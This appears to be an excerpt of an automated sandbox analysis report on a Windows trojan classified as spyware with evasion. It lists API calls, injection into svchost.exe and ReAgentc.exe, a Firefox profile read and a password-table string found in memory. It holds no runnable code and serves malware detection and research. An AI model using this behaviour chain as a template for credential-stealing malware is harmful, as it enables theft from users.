                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00F7A1EF
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F68310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00F68310
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F751BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00F751BD
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F1E6A00_2_00F1E6A0
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F3D9750_2_00F3D975
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F321C50_2_00F321C5
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F462D20_2_00F462D2
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F903DA0_2_00F903DA
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F4242E0_2_00F4242E
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F325FA0_2_00F325FA
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F266E10_2_00F266E1
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F6E6160_2_00F6E616
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F4878F0_2_00F4878F
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F788890_2_00F78889
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F908570_2_00F90857
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F468440_2_00F46844
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F288080_2_00F28808
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F3CB210_2_00F3CB21
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F46DB60_2_00F46DB6
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F26F9E0_2_00F26F9E
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F230300_2_00F23030
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F3F1D90_2_00F3F1D9
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F331870_2_00F33187
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F112870_2_00F11287
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F314840_2_00F31484
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F255200_2_00F25520
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F376960_2_00F37696
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F257600_2_00F25760
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F319780_2_00F31978
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F49AB50_2_00F49AB5
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F1FCE00_2_00F1FCE0
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F97DDB0_2_00F97DDB
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F3BDA60_2_00F3BDA6
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F31D900_2_00F31D90
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F23FE00_2_00F23FE0
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F1DF000_2_00F1DF00
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_017A99400_2_017A9940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004F8A732_2_004F8A73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004E285C2_2_004E285C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004E28602_2_004E2860
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0050F0832_2_0050F083
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004F02632_2_004F0263
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004E12802_2_004E1280
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004E33C02_2_004E33C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004F6C6E2_2_004F6C6E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004EE4632_2_004EE463
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004F6C732_2_004F6C73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004F04832_2_004F0483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004EE5A72_2_004EE5A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004EE5B32_2_004EE5B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004E26AC2_2_004E26AC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004E26B02_2_004E26B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004E2F7C2_2_004E2F7C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004E47C72_2_004E47C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004E2F802_2_004E2F80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F41A22_2_030F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D20002_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E44202_2_030E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E2F302_2_030E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DCD1F2_2_030DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E1AA32_2_030E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D59102_2_030D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BD8ABE3_2_03BD8ABE
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BE12C83_2_03BE12C8
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BF78DE3_2_03BF78DE
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BD6E0E3_2_03BD6E0E
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BD6E023_2_03BD6E02
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BD6CBE3_2_03BD6CBE
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BD8CDE3_2_03BD8CDE
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BDF4CE3_2_03BDF4CE
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeCode function: 3_2_03BDF4C93_2_03BDF4C9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 102 times
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: String function: 00F30AE3 appears 70 times
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: String function: 00F38900 appears 42 times
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: String function: 00F17DE1 appears 35 times
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, 00000000.00000003.2127830940.0000000003FCD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe, 00000000.00000003.2125478170.0000000003903000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@17/13
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7A06A GetLastError,FormatMessageW,0_2_00F7A06A
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F681CB AdjustTokenPrivileges,CloseHandle,0_2_00F681CB
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00F687E1
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F7B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F7B3FB
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F8EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00F8EE0D
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F883BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00F883BB
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeCode function: 0_2_00F14E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00F14E89
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeFile created: C:\Users\user\AppData\Local\Temp\aut2FA2.tmpJump to behavior
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ReAgentc.exe, 00000004.00000002.4581949171.0000000002634000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000002.4581949171.0000000002661000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000003.2482309955.0000000002613000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000003.2486319224.000000000263F000.00000004.00000020.00020000.00000000.sdmp, ReAgentc.exe, 00000004.00000003.2482422045.0000000002634000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeReversingLabs: Detection: 31%
                Source: unknownProcess created: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe"
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe"
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeProcess created: C:\Windows\SysWOW64\ReAgentc.exe "C:\Windows\SysWOW64\ReAgentc.exe"
                Source: C:\Windows\SysWOW64\ReAgentc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe"Jump to behavior
                Source: C:\Program Files (x86)\naAurgUrgwmxjkGFBsPsoANEAhkyRyuxCpkGIltPNFOauXaMBKtgANpJlvXEXqauzOkqPUnOH\ASmwljQNPNM.exeProcess created: C:\Windows\SysWOW64\ReAgentc.exe "C:\Windows\SysWOW64\ReAgentc.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: reagent.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\ReAgentc.exeSection loaded: kernel.appcore.dllJump to behavior
